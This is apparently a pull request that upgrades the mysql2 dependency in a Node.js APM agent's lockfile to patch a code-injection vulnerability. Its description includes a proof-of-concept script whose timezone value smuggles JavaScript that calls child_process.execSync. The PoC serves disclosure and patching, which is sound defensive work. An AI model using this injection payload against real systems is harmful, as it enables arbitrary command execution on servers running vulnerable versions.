### PR TITLE
fix: Improper control of generation of code Injection

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -13690,9 +13690,9 @@
       }
     },
     "node_modules/mysql2": {
-      "version": "3.2.4",
-      "resolved": "https://registry.npmjs.org/mysql2/-/mysql2-3.2.4.tgz",
-      "integrity": "sha512-VRjBMAB/WXd35cytsbKPy5eQMdHTQu661CcFAK+pcScVCfGpzQQR9EOM9H4z9tvEW0maVOjTAX0dqXneLX4kaQ==",
+      "version": "3.9.7",
+      "resolved": "https://registry.npmjs.org/mysql2/-/mysql2-3.9.7.tgz",
+      "integrity": "sha512-KnJT8vYRcNAZv73uf9zpXqNbvBG7DJrs+1nACsjZP1HMJ1TgXEy8wnNilXAn/5i57JizXKtrUtwDB7HxT9DDpw==",
       "dev": true,
       "dependencies": {
         "denque": "^2.1.0",
@@ -28816,9 +28816,9 @@
       }
     },
     "mysql2": {
-      "version": "3.2.4",
-      "resolved": "https://registry.npmjs.org/mysql2/-/mysql2-3.2.4.tgz",
-      "integrity": "sha512-VRjBMAB/WXd35cytsbKPy5eQMdHTQu661CcFAK+pcScVCfGpzQQR9EOM9H4z9tvEW0maVOjTAX0dqXneLX4kaQ==",
+      "version": "3.9.7",
+      "resolved": "https://registry.npmjs.org/mysql2/-/mysql2-3.9.7.tgz",
+      "integrity": "sha512-KnJT8vYRcNAZv73uf9zpXqNbvBG7DJrs+1nACsjZP1HMJ1TgXEy8wnNilXAn/5i57JizXKtrUtwDB7HxT9DDpw==",
       "dev": true,
       "requires": {
         "denque": "^2.1.0",


### PR DESCRIPTION
Affected of this project `elastic/apm-agent-nodejs` are vulnerable to Arbitrary Code Injection due to improper sanitization of the timezone parameter in the `readCodeFor` function by calling a native MySQL Server date/time function.

**PoC**
```js
const mysql = require('elastic-apm-node');
const mysql = require('mysql2');
const connection = mysql.createConnection({
  host: '127.0.0.1',
  user: 'root',
  database: 'elasticdb',
  password: 'mysql2pass',
});

let query_data = {
  sql: `SELECT CURDATE();`,
  timezone:
    "');''.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app');console.log('",
};

connection.query(query_data, (err, results) => {
  if (err) throw err;
  console.log(results);
});

connection.end();
```
CWE-94
`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

<!--

Replace this comment with a description of what's being changed by this PR.

If this PR should close an issue, please add one of the magic keywords
(e.g. Fixes) followed by the issue number. For more info see:
https://help.github.com/articles/closing-issues-using-keywords/

-->

### Checklist

<!-- Potential tasks related to a new PR. Remove tasks that are not relevant -->

- [x] Implement code
- [x] Add tests
- [ ] Update TypeScript typings
- [ ] Update documentation
- [ ] Add CHANGELOG.asciidoc entry
- [x] Commit message follows [commit guidelines](https://github.com/elastic/apm-agent-nodejs/blob/main/CONTRIBUTING.md#commit-message-guidelines)
